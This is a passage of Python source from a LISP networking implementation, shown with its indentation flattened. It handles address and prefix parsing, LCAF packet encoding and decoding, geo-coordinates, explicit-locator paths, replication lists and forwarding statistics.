geo.name = "geo-prefix-{}".format(geo)
geo.parse_geo_string(addr_str)
self.address = geo
elif (self.is_mac()):
addr_str = addr_str.replace("-", "")
value = int(addr_str, 16)
self.address = value
elif (self.is_e164()):
addr_str = addr_str[1::]
value = int(addr_str, 16)
self.address = value << 4
elif (self.is_dist_name()):
self.address = addr_str.replace("'", "")
#endif
self.mask_len = self.host_mask_len()
#enddef
def store_prefix(self, prefix_str):
if (self.is_geo_string(prefix_str)):
index = prefix_str.find("]")
mask_len = len(prefix_str[index+1::]) * 8
elif (prefix_str.find("/") != -1):
prefix_str, mask_len = prefix_str.split("/")
else:
left = prefix_str.find("'")
if (left == -1): return
right = prefix_str.find("'", left+1)
if (right == -1): return
mask_len = len(prefix_str[left+1:right]) * 8
#endif
self.string_to_afi(prefix_str)
self.store_address(prefix_str)
self.mask_len = int(mask_len)
#enddef
def zero_host_bits(self):
if (self.mask_len < 0): return
mask = (2 ** self.mask_len) - 1
shift = self.addr_length() * 8 - self.mask_len
mask <<= shift
self.address &= mask
#enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
def string_to_afi(self, addr_str):
if (addr_str.count("'") == 2):
self.afi = LISP_AFI_NAME
return
#endif
if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
else: self.afi = LISP_AFI_NONE
#enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
def print_address_no_iid(self):
if (self.is_ipv4()):
addr = self.address
value1 = addr >> 24
value2 = (addr >> 16) & 0xff
value3 = (addr >> 8) & 0xff
value4 = addr & 0xff
return("{}.{}.{}.{}".format(value1, value2, value3, value4))
elif (self.is_ipv6()):
addr_str = lisp_hex_string(self.address).zfill(32)
addr_str = binascii.unhexlify(addr_str)
addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
return("{}".format(addr_str))
elif (self.is_geo_prefix()):
return("{}".format(self.address.print_geo()))
elif (self.is_mac()):
addr_str = lisp_hex_string(self.address).zfill(12)
addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
addr_str[8:12])
return("{}".format(addr_str))
elif (self.is_e164()):
addr_str = lisp_hex_string(self.address).zfill(15)
return("+{}".format(addr_str))
elif (self.is_dist_name()):
return("'{}'".format(self.address))
elif (self.is_null()):
return("no-address")
#endif
return("unknown-afi:{}".format(self.afi))
#enddef
def print_prefix(self):
if (self.is_ultimate_root()): return("[*]")
if (self.is_iid_range()):
if (self.mask_len == 32): return("[{}]".format(self.instance_id))
upper = self.instance_id + (2**(32 - self.mask_len) - 1)
return("[{}-{}]".format(self.instance_id, upper))
#endif
addr = self.print_address()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
index = addr.find("no-address")
if (index == -1):
addr = "{}/{}".format(addr, str(self.mask_len))
else:
addr = addr[0:index]
#endif
return(addr)
#enddef
def print_prefix_no_iid(self):
addr = self.print_address_no_iid()
if (self.is_dist_name()): return(addr)
if (self.is_geo_prefix()): return(addr)
return("{}/{}".format(addr, str(self.mask_len)))
#enddef
def print_prefix_url(self):
if (self.is_ultimate_root()): return("0--0")
addr = self.print_address()
index = addr.find("]")
if (index != -1): addr = addr[index+1::]
if (self.is_geo_prefix()):
addr = addr.replace("/", "-")
return("{}-{}".format(self.instance_id, addr))
#endif
return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
#enddef
def print_sg(self, g):
s = self.print_prefix()
si = s.find("]") + 1
g = g.print_prefix()
gi = g.find("]") + 1
sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
return(sg_str)
#enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
def is_more_specific(self, prefix):
if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
mask_len = prefix.mask_len
if (prefix.afi == LISP_AFI_IID_RANGE):
size = 2**(32 - mask_len)
lower = prefix.instance_id
upper = lower + size
return(self.instance_id in range(lower, upper))
#endif
if (self.instance_id != prefix.instance_id): return(False)
if (self.afi != prefix.afi):
if (prefix.afi != LISP_AFI_NONE): return(False)
#endif
#
# Handle string addresses like distinguished names and geo-prefixes.
#
if (self.is_binary() == False):
if (prefix.afi == LISP_AFI_NONE): return(True)
if (type(self.address) != type(prefix.address)): return(False)
addr = self.address
paddr = prefix.address
if (self.is_geo_prefix()):
addr = self.address.print_geo()
paddr = prefix.address.print_geo()
#endif
if (len(addr) < len(paddr)): return(False)
return(addr.find(paddr) == 0)
#endif
#
# Handle numeric addresses.
#
if (self.mask_len < mask_len): return(False)
shift = (prefix.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
return((self.address & mask) == prefix.address)
#enddef
def mask_address(self, mask_len):
shift = (self.addr_length() * 8) - mask_len
mask = (2**mask_len - 1) << shift
self.address &= mask
#enddef
def is_exact_match(self, prefix):
if (self.instance_id != prefix.instance_id): return(False)
p1 = self.print_prefix()
p2 = prefix.print_prefix() if prefix else ""
return(p1 == p2)
#enddef
def is_local(self):
if (self.is_ipv4()):
local = lisp_myrlocs[0]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
if (self.is_ipv6()):
local = lisp_myrlocs[1]
if (local == None): return(False)
local = local.print_address_no_iid()
return(self.print_address_no_iid() == local)
#endif
return(False)
#enddef
def store_iid_range(self, iid, mask_len):
if (self.afi == LISP_AFI_NONE):
if (iid is 0 and mask_len is 0): self.afi = LISP_AFI_ULTIMATE_ROOT
else: self.afi = LISP_AFI_IID_RANGE
#endif
self.instance_id = iid
self.mask_len = mask_len
#enddef
def lcaf_length(self, lcaf_type):
length = self.addr_length() + 2
if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
return(length)
#enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_iid(self):
lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
addr_length = socket.htons(self.lcaf_length(lcaf_type))
iid = self.instance_id
afi = self.afi
ml = 0
if (afi < 0):
if (self.afi == LISP_AFI_GEO_COORD):
afi = LISP_AFI_LCAF
ml = 0
else:
afi = 0
ml = self.mask_len
#endif
#endif
lcaf = struct.pack("BBBBH", 0, 0, lcaf_type, ml, addr_length)
lcaf += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
if (afi == 0): return(lcaf)
if (self.afi == LISP_AFI_GEO_COORD):
lcaf = lcaf[0:-2]
lcaf += self.address.encode_geo()
return(lcaf)
#endif
lcaf += self.pack_address()
return(lcaf)
#enddef
def lcaf_decode_iid(self, packet):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
x, y, lcaf_type, iid_ml, length = struct.unpack(packet_format,
packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)
packet_format = "IH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
iid, afi = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
length = socket.ntohs(length)
self.instance_id = socket.ntohl(iid)
afi = socket.ntohs(afi)
self.afi = afi
if (iid_ml != 0 and afi == 0): self.mask_len = iid_ml
if (afi == 0):
self.afi = LISP_AFI_IID_RANGE if iid_ml else LISP_AFI_ULTIMATE_ROOT
#endif
#
# No address encoded.
#
if (afi == 0): return(packet)
#
# Look for distinguished-name.
#
if (self.is_dist_name()):
packet, self.address = lisp_decode_dist_name(packet)
self.mask_len = len(self.address) * 8
return(packet)
#endif
#
# Only process geo-prefixes inside of an LCAF encoded Instance-ID type.
#
if (afi == LISP_AFI_LCAF):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
return(packet)
#endif
addr_length = self.addr_length()
if (len(packet) < addr_length): return(None)
packet = self.unpack_address(packet)
return(packet)
#enddef
#
# Multicast Info Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 9 | Rsvd2 |R|L|J| 8 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance-ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Source MaskLen| Group MaskLen |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Source/Subnet Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Group Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
def lcaf_encode_sg(self, group):
lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
iid = socket.htonl(self.instance_id)
addr_length = socket.htons(self.lcaf_length(lcaf_type))
lcaf = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, addr_length, iid,
0, self.mask_len, group.mask_len)
lcaf += struct.pack("H", socket.htons(self.afi))
lcaf += self.pack_address()
lcaf += struct.pack("H", socket.htons(group.afi))
lcaf += group.pack_address()
return(lcaf)
#enddef
def lcaf_decode_sg(self, packet):
packet_format = "BBBBHIHBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
x, y, lcaf_type, rsvd, length, iid, z, sml, gml = \
struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])
self.instance_id = socket.ntohl(iid)
length = socket.ntohs(length) - 8
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
self.afi = socket.ntohs(afi)
self.mask_len = sml
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = self.unpack_address(packet)
if (packet == None): return([None, None])
length -= addr_length
#
# Get AFI and source address. Validate if enough length and there
# are bytes in the packet.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
if (length < format_size): return([None, None])
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
length -= format_size
group = lisp_address(LISP_AFI_NONE, "", 0, 0)
group.afi = socket.ntohs(afi)
group.mask_len = gml
group.instance_id = self.instance_id
addr_length = self.addr_length()
if (length < addr_length): return([None, None])
packet = group.unpack_address(packet)
if (packet == None): return([None, None])
return([packet, group])
#enddef
def lcaf_decode_eid(self, packet):
packet_format = "BBB"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
#
# Do not advance packet pointer. The specific LCAF decoders will do
# it themselves.
#
rsvd, flags, lcaf_type = struct.unpack(packet_format,
packet[:format_size])
if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
return([self.lcaf_decode_iid(packet), None])
elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
packet, group = self.lcaf_decode_sg(packet)
return([packet, group])
elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
rsvd1, flags, lcaf_type, rsvd2, lcaf_len = \
struct.unpack(packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
if (lcaf_len > len(packet)): return(None)
geo = lisp_geo("")
self.instance_id = 0
self.afi = LISP_AFI_GEO_COORD
self.address = geo
packet = geo.decode_geo(packet, lcaf_len, rsvd2)
self.mask_len = self.host_mask_len()
#endif
return([packet, None])
#enddef
#endclass
#
# Data structure for storing learned or configured ELPs.
#
class lisp_elp_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.probe = False
self.strict = False
self.eid = False
self.we_are_last = False
#enddef
def copy_elp_node(self):
elp_node = lisp_elp_node()
elp_node.copy_address(self.address)
elp_node.probe = self.probe
elp_node.strict = self.strict
elp_node.eid = self.eid
elp_node.we_are_last = self.we_are_last
return(elp_node)
#enddef
#endclass
class lisp_elp():
def __init__(self, name):
self.elp_name = name
self.elp_nodes = []
self.use_elp_node = None
self.we_are_last = False
#enddef
def copy_elp(self):
elp = lisp_elp(self.elp_name)
elp.use_elp_node = self.use_elp_node
elp.we_are_last = self.we_are_last
for elp_node in self.elp_nodes:
elp.elp_nodes.append(elp_node.copy_elp_node())
#endfor
return(elp)
#enddef
def print_elp(self, want_marker):
elp_str = ""
for elp_node in self.elp_nodes:
use_or_last = ""
if (want_marker):
if (elp_node == self.use_elp_node):
use_or_last = "*"
elif (elp_node.we_are_last):
use_or_last = "x"
#endif
#endif
elp_str += "{}{}({}{}{}), ".format(use_or_last,
elp_node.address.print_address_no_iid(),
"r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
"S" if elp_node.strict else "s")
#endfor
return(elp_str[0:-2] if elp_str != "" else "")
#enddef
def select_elp_node(self):
v4, v6, device = lisp_myrlocs
index = None
for elp_node in self.elp_nodes:
if (v4 and elp_node.address.is_exact_match(v4)):
index = self.elp_nodes.index(elp_node)
break
#endif
if (v6 and elp_node.address.is_exact_match(v6)):
index = self.elp_nodes.index(elp_node)
break
#endif
#endfor
#
# If we did not find a match, this is possibly an ITR. We need to give
# if the first ELP node.
#
if (index == None):
self.use_elp_node = self.elp_nodes[0]
elp_node.we_are_last = False
return
#endif
#
# If we matched the last item in the ELP nodes, we are the end of the
# path. Flag it for display purposes and return None.
#
if (self.elp_nodes[-1] == self.elp_nodes[index]):
self.use_elp_node = None
elp_node.we_are_last = True
return
#endif
#
# Return the next node after the one that matches this system.
#
self.use_elp_node = self.elp_nodes[index+1]
return
#enddef
#endclass
class lisp_geo():
def __init__(self, name):
self.geo_name = name
self.latitude = 0xffffffff # Negative when North, otherwise South
self.lat_mins = 0
self.lat_secs = 0
self.longitude = 0xffffffff # Negative when East, otherwise West
self.long_mins = 0
self.long_secs = 0
self.altitude = -1
self.radius = 0
#enddef
def copy_geo(self):
geo = lisp_geo(self.geo_name)
geo.latitude = self.latitude
geo.lat_mins = self.lat_mins
geo.lat_secs = self.lat_secs
geo.longitude = self.longitude
geo.long_mins = self.long_mins
geo.long_secs = self.long_secs
geo.altitude = self.altitude
geo.radius = self.radius
return(geo)
#enddef
def no_geo_altitude(self):
return(self.altitude == -1)
#enddef
def parse_geo_string(self, geo_str):
index = geo_str.find("]")
if (index != -1): geo_str = geo_str[index+1::]
#
# Check if radius is specified. That is a geo-prefix and not just a
# geo-point.
#
if (geo_str.find("/") != -1):
geo_str, radius = geo_str.split("/")
self.radius = int(radius)
#endif
geo_str = geo_str.split("-")
if (len(geo_str) < 8): return(False)
latitude = geo_str[0:4]
longitude = geo_str[4:8]
#
# Get optional altitude.
#
if (len(geo_str) > 8): self.altitude = int(geo_str[8])
#
# Get latitude values.
#
self.latitude = int(latitude[0])
self.lat_mins = int(latitude[1])
self.lat_secs = int(latitude[2])
if (latitude[3] == "N"): self.latitude = -self.latitude
#
# Get longitude values.
#
self.longitude = int(longitude[0])
self.long_mins = int(longitude[1])
self.long_secs = int(longitude[2])
if (longitude[3] == "E"): self.longitude = -self.longitude
return(True)
#enddef
def print_geo(self):
n_or_s = "N" if self.latitude < 0 else "S"
e_or_w = "E" if self.longitude < 0 else "W"
geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
self.long_mins, self.long_secs, e_or_w)
if (self.no_geo_altitude() == False):
geo_str += "-" + str(self.altitude)
#endif
#
# Print "/<radius>" if not 0.
#
if (self.radius != 0): geo_str += "/{}".format(self.radius)
return(geo_str)
#enddef
def geo_url(self):
zoom = os.getenv("LISP_GEO_ZOOM_LEVEL")
zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
lat, lon = self.dms_to_decimal()
url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
"&markers=color:blue%7Clabel:lisp%7C{},{}" + \
"&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat, lon,
zoom)
return(url)
#enddef
def print_geo_url(self):
geo = self.print_geo()
if (self.radius == 0):
url = self.geo_url()
string = "<a href='{}'>{}</a>".format(url, geo)
else:
url = geo.replace("/", "-")
string = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo)
#endif
return(string)
#enddef
def dms_to_decimal(self):
degs, mins, secs = self.latitude, self.lat_mins, self.lat_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_lat = dd
degs, mins, secs = self.longitude, self.long_mins, self.long_secs
dd = float(abs(degs))
dd += float(mins * 60 + secs) / 3600
if (degs > 0): dd = -dd
dd_long = dd
return((dd_lat, dd_long))
#enddef
def get_distance(self, geo_point):
dd_prefix = self.dms_to_decimal()
dd_point = geo_point.dms_to_decimal()
distance = vincenty(dd_prefix, dd_point)
return(distance.km)
#enddef
def point_in_circle(self, geo_point):
km = self.get_distance(geo_point)
return(km <= self.radius)
#enddef
def encode_geo(self):
lcaf_afi = socket.htons(LISP_AFI_LCAF)
geo_len = socket.htons(20 + 2)
flags = 0
lat = abs(self.latitude)
lat_ms = ((self.lat_mins * 60) + self.lat_secs) * 1000
if (self.latitude < 0): flags |= 0x40
lon = abs(self.longitude)
lon_ms = ((self.long_mins * 60) + self.long_secs) * 1000
if (self.longitude < 0): flags |= 0x20
alt = 0
if (self.no_geo_altitude() == False):
alt = socket.htonl(self.altitude)
flags |= 0x10
#endif
radius = socket.htons(self.radius)
if (radius != 0): flags |= 0x06
pkt = struct.pack("HBBBBH", lcaf_afi, 0, 0, LISP_LCAF_GEO_COORD_TYPE,
0, geo_len)
pkt += struct.pack("BBHBBHBBHIHHH", flags, 0, 0, lat, lat_ms >> 16,
socket.htons(lat_ms & 0x0ffff), lon, lon_ms >> 16,
socket.htons(lon_ms & 0xffff), alt, radius, 0, 0)
return(pkt)
#enddef
def decode_geo(self, packet, lcaf_len, radius_hi):
packet_format = "BBHBBHBBHIHHH"
format_size = struct.calcsize(packet_format)
if (lcaf_len < format_size): return(None)
flags, r1, uncertainty, lat, lat_hi, lat_ms, lon, lon_hi, lon_ms, \
alt, radius, r2, afi = struct.unpack(packet_format,
packet[:format_size])
#
# No nested LCAFs in Geo-Coord type.
#
afi = socket.ntohs(afi)
if (afi == LISP_AFI_LCAF): return(None)
if (flags & 0x40): lat = -lat
self.latitude = lat
lat_secs = ((lat_hi << 16) | socket.ntohs(lat_ms)) / 1000
self.lat_mins = lat_secs / 60
self.lat_secs = lat_secs % 60
if (flags & 0x20): lon = -lon
self.longitude = lon
lon_secs = ((lon_hi << 16) | socket.ntohs(lon_ms)) / 1000
self.long_mins = lon_secs / 60
self.long_secs = lon_secs % 60
self.altitude = socket.ntohl(alt) if (flags & 0x10) else -1
radius = socket.ntohs(radius)
self.radius = radius if (flags & 0x02) else radius * 1000
self.geo_name = None
packet = packet[format_size::]
if (afi != 0):
self.rloc.afi = afi
packet = self.rloc.unpack_address(packet)
self.rloc.mask_len = self.rloc.host_mask_len()
#endif
return(packet)
#enddef
#endclass
#
# Structure for Replication List Entries.
#
class lisp_rle_node():
def __init__(self):
self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.level = 0
self.translated_port = 0
self.rloc_name = None
#enddef
def copy_rle_node(self):
rle_node = lisp_rle_node()
rle_node.address.copy_address(self.address)
rle_node.level = self.level
rle_node.translated_port = self.translated_port
rle_node.rloc_name = self.rloc_name
return(rle_node)
#enddef
def store_translated_rloc(self, rloc, port):
self.address.copy_address(rloc)
self.translated_port = port
#enddef
def get_encap_keys(self):
port = "4341" if self.translated_port == 0 else \
str(self.translated_port)
addr_str = self.address.print_address_no_iid() + ":" + port
try:
keys = lisp_crypto_keys_by_rloc_encap[addr_str]
if (keys[1]): return(keys[1].encrypt_key, keys[1].icv_key)
return(None, None)
except:
return(None, None)
#endtry
#enddef
#endclass
class lisp_rle():
def __init__(self, name):
self.rle_name = name
self.rle_nodes = []
self.rle_forwarding_list = []
#enddef
def copy_rle(self):
rle = lisp_rle(self.rle_name)
for rle_node in self.rle_nodes:
rle.rle_nodes.append(rle_node.copy_rle_node())
#endfor
rle.build_forwarding_list()
return(rle)
#enddef
def print_rle(self, html):
rle_str = ""
for rle_node in self.rle_nodes:
port = rle_node.translated_port
rle_name_str = blue(rle_node.rloc_name, html) if \
rle_node.rloc_name != None else ""
addr_str = rle_node.address.print_address_no_iid()
if (rle_node.address.is_local()): addr_str = red(addr_str, html)
rle_str += "{}{}(L{}){}, ".format(addr_str, "" if port == 0 \
else "-" + str(port), rle_node.level,
"" if rle_node.rloc_name == None else rle_name_str)
#endfor
return(rle_str[0:-2] if rle_str != "" else "")
#enddef
def build_forwarding_list(self):
level = -1
for rle_node in self.rle_nodes:
if (level == -1):
if (rle_node.address.is_local()): level = rle_node.level
else:
if (rle_node.level > level): break
#endif
#endfor
level = 0 if level == -1 else rle_node.level
self.rle_forwarding_list = []
for rle_node in self.rle_nodes:
if (rle_node.level == level or (level == 0 and
rle_node.level == 128)):
if (lisp_i_am_rtr == False and rle_node.address.is_local()):
addr_str = rle_node.address.print_address_no_iid()
lprint("Exclude local RLE RLOC {}".format(addr_str))
continue
#endif
self.rle_forwarding_list.append(rle_node)
#endif
#endfor
#enddef
#endclass
class lisp_json():
def __init__(self, name, string):
self.json_name = name
self.json_string = string
#enddef
def add(self):
self.delete()
lisp_json_list[self.json_name] = self
#enddef
def delete(self):
if (lisp_json_list.has_key(self.json_name)):
del(lisp_json_list[self.json_name])
lisp_json_list[self.json_name] = None
#endif
#enddef
def print_json(self, html):
good_string = self.json_string
bad = "***"
if (html): bad = red(bad, html)
bad_string = bad + self.json_string + bad
if (self.valid_json()): return(good_string)
return(bad_string)
#enddef
def valid_json(self):
try:
json.loads(self.json_string)
except:
return(False)
#endtry
return(True)
#enddef
#endclass
#
# LISP forwarding stats info.
#
class lisp_stats():
def __init__(self):
self.packet_count = 0
self.byte_count = 0
self.last_rate_check = 0
self.last_packet_count = 0
self.last_byte_count = 0
self.last_increment = None
#enddef
def increment(self, octets):
self.packet_count += 1
self.byte_count += octets
self.last_increment = lisp_get_timestamp()
#enddef
def recent_packet_sec(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 1)
#enddef
def recent_packet_min(self):
if (self.last_increment == None): return(False)
elapsed = time.time() - self.last_increment
return(elapsed <= 60)
#enddef
def stat_colors(self, c1, c2, html):
if (self.recent_packet_sec()):
return(green_last_sec(c1), green_last_sec(c2))
#endif
if (self.recent_packet_min()):
return(green_last_min(c1), green_last_min(c2))
#endif
return(c1, c2)
#enddef
def normalize(self, count):
count = str(count)
digits = len(count)
if (digits > 12):
count = count[0:-10] + "." + count[-10:-7] + "T"
return(count)
#endif
if (digits > 9):
count = count[0:-9] + "." + count[-9:-7] + "B"
return(count)
#endif
if (digits > 6):
count = count[0:-6] + "." + count[-6] + "M"
return(count)
#endif
return(count)
#enddef
def get_stats(self, summary, html):
last_rate = self.last_rate_check
last_packets = self.last_packet_count
last_bytes = self.last_byte_count
self.last_rate_check = lisp_get_timestamp()
self.last_packet_count = self.packet_count
self.last_byte_count = self.byte_count
rate_diff = self.last_rate_check - last_rate
if (rate_diff == 0):
packet_rate = 0
bit_rate = 0
else:
packet_rate = int((self.packet_count - last_packets) / rate_diff)
bit_rate = (self.byte_count - last_bytes) / rate_diff
bit_rate = (bit_rate * 8) / 1000000
bit_rate = round(bit_rate, 2)
#endif
#
# Normalize and put in string form.
#
packets = self.normalize(self.packet_count)
bc = self.normalize(self.byte_count)
#
# The summary version gives you the string above in a pull-down html
# menu and the title string is the string below.
#
if (summary):
h = "<br>" if html else ""
packets, bc = self.stat_colors(packets, bc, html)
title = "packet-count: {}{}byte-count: {}".format(packets, h, bc)
stats = "packet-rate: {} pps\nbit-rate: {} Mbps".format( \
packet_rate, bit_rate)
if (html != ""): stats = lisp_span(title, stats)
else:
prate = str(packet_rate)
brate = str(bit_rate)
if (html):
packets = lisp_print_cour(packets)
prate = lisp_print_cour(prate)
bc = lisp_print_cour(bc)
brate = lisp_print_cour(brate)
#endif
h = "<br>" if html else ", "
stats = ("packet-count: {}{}packet-rate: {} pps{}byte-count: " + \
"{}{}bit-rate: {} mbps").format(packets, h, prate, h, bc, h,
brate)
#endif
return(stats)
#enddef
#endclass
#
# ETR/RTR decapsulation total packet and errors stats. Anytime a lisp_packet().
# packet_error value is added, this dictionary array needs to add the key
# string.
#
lisp_decap_stats = {
"good-packets" : lisp_stats(), "ICV-error" : lisp_stats(),
"checksum-error" : lisp_stats(), "lisp-header-error" : lisp_stats(),
"no-decrypt-key" : lisp_stats(), "bad-inner-version" : lisp_stats(),
"outer-header-error" : lisp_stats()
}
#
# This a locator record definition as defined in RFCs.
#
class lisp_rloc():
def __init__(self, recurse=True):
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.rloc_name = None
self.interface = None
self.translated_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.translated_port = 0
self.priority = 255
self.weight = 0
self.mpriority = 255
self.mweight = 0
self.uptime = 0
self.state = LISP_RLOC_UP_STATE
self.last_state_change = None
self.rle_name = None
self.elp_name = None
self.geo_name = None
self.json_name = None
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.stats = lisp_stats()
self.last_rloc_probe = None
self.last_rloc_probe_reply = None
self.rloc_probe_rtt = -1
self.recent_rloc_probe_rtts = [-1, -1, -1]
